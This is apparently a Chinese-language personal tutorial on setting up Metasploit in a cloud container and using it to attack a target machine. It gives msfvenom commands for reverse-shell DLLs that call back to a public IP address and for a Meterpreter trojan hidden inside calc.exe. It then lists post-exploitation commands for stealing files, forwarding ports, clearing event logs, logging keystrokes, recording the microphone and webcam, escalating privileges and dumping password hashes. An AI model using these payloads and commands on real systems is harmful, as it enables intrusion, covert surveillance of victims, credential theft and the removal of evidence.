
安装MSF
安装msf:
| 1 | cd /opt | 
安装postgresql
| 1 | apt-get install postgresql | 
创建用户时出现的问题及解决方案

service postgresql restart
重启即可,每次用docker开启一个新的容器都要把里面的服务开启
配置metasploit数据库的连接
在metasploit的安装目录下新建database.yml文件,内容如下
| 1 | production: | 
然后在msf中手动连接数据库
| 1 | msf > db_connect -y /opt/metasploit-framework/database.yml | 
解决metasploit搜索缓慢

- 重启postgresql
| 1 | service postgresql restart | 
- 重建msf缓存表
| 1 | msf > db_status | 
然后就能实现秒搜索了
安装Apache2
为什么要安装apache2?
我把msf放到了云服务中的docker中,方便使用公网IP,但是生成的dll 、 exe无法下载到本地,所以要借助apache的文件下载功能
| 1 | apt-get install apache2 | 
MSF反弹shell
生成dll
64位:
| 1 | msfvenom -p windows/x64/shell_reverse_tcp -a x64 lhost=47.95.206.199 lport=6666 -f dll -o ./6666.dll | 
32位:
| 1 | msfvenom -p windows/shell_reverse_tcp lhost=47.95.206.199 lport=6666 -f dll -o ./6666.dll | 
简单说下这些参数:
| 1 | -p 选择使用的payload | 
监听
| 1 | use exploit/multi/handler | 
靶机运行后的效果

补充说明:运行dll命令 -> rundll32 dll.dll,Strart
Meterpreter
生成木马
| 1 | msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 lhost=192.168.1.101 lport=4444 -f exe -x calc.exe -k -o ./meter.exe | 
| 1 | --platforms 有效的负荷平台 | 
Meterpreter控制端使用
只写一些常用的,其他的以后用到了再补充
background
将当前的session放入后台,继续用msf进行其他渗透工作

| 1 | sessions 查看后台运行的session列表 | 
对目录和文件的操作
- cat :读取并显示某个文件

- cd:跳转到某个目录 
- dir && ls :列出靶机目录下的文件 

- cp 源文件 目标文件(windows路径用\\或者/) # 复制文件

- download 文件名 # 从目标服务器下载文件

- upload 本地文件名 # 从本地向目标服务器上传文件

- lls 列出msf所在机器上当前目录下的内容

- getwd && pwd # 获取靶机当前shell工作目录 
- getlwd && lpwd # 获取本机的shell工作目录 

- edit 文件名 # 编辑文件


- mkdir\rmdir 目录名 # 创建或删除目录

- mv 源文件 目标文件 # 移动文件 
- rm 文件 # 删除文件 
- show_mount # 查看靶机的盘符 

网络相关
- arp # 查看靶机的arp缓存表

- getproxy # 查看靶机的代理情况

- ipconfig && ifconfig # 查看靶机的ip 
- netstat 查看靶机的端口情况,结果包括产生端口的进程 

- portfwd add -l msf机端口 -r 靶机IP -p 靶机端口 # 端口转发

然后连接靶机远程桌面直接连接本地的8888即可。
- resolve 主机名 -f IPv4 or IPv6 # 解析主机名

- route # 查看靶机的路由表

系统相关
- getuid # 查看当前用户名 
- clearev # 清除事件日志 
- execute -f 程序 # 执行一个程序 

- getprivs # 查看msf shell所拥有的权限

- kill PID # 终止一个进程

- localtime # 查看靶机的时间 
- pgrep 进程名 # 根据进程名查PID 

- pkill 进程名 # 根据进程名结束进程

- ps # 查看运行中的进程

- reboot & shutdown # 重启 或 关机 
- sysinfo 查看系统信息 

用户接口相关
- keyscan系列
| 1 | keyscan_start # 开始记录键盘 | 

- screenshot # 捕捉桌面

- uictl [enable/disable] [keyboard/mouse/all] 启用(禁用)鼠标键盘,win32可用
摄像头相关
- record_mic -d 秒数 -f 保存的文件名 # 记录麦克风 
- webcam_list # 显示靶机有哪些摄像头 

- webcam_stream # 打开摄像头流,并用html呈现

- webcam_snap # 抓拍一张摄像头的图片

- webcam_chat # 和靶机进行视频聊天,也是html中呈现
其他
- getsystem # 尝试漏洞来获取system权限

XP测试图
- hashdump # 获取系统中用户密码的hash
